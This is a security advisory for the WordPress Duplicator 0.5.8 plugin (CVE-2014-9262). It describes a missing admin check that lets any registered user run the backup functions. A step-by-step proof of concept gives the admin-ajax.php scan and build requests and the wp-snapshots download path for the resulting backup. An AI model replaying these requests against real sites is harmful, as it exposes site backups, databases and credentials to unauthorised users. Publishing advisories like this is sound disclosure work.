Duplicator 0.5.8 Privilege Escalation

Homepage:

https://wordpress.org/plugins/duplicator/

CVE-ID

CVE-2014-9262

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

Package functions are accessible to every registered users because admin privileges are not checked properly.

So every registered user can create and download backup files.

File: duplicator\duplicator.php

add_action('wp_ajax_duplicator_package_scan',		'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build',		'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete',		'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report',		'duplicator_package_report');

Proof of Concept:

Login as regular user (created using wp-login.php?action=register) then start scan:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan

After that you can build backup:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build

This function will return json with backup name inside File key.

You can download backup using:

http://wordpress-url/wp-snapshots/%file_name_from_json%

Timeline: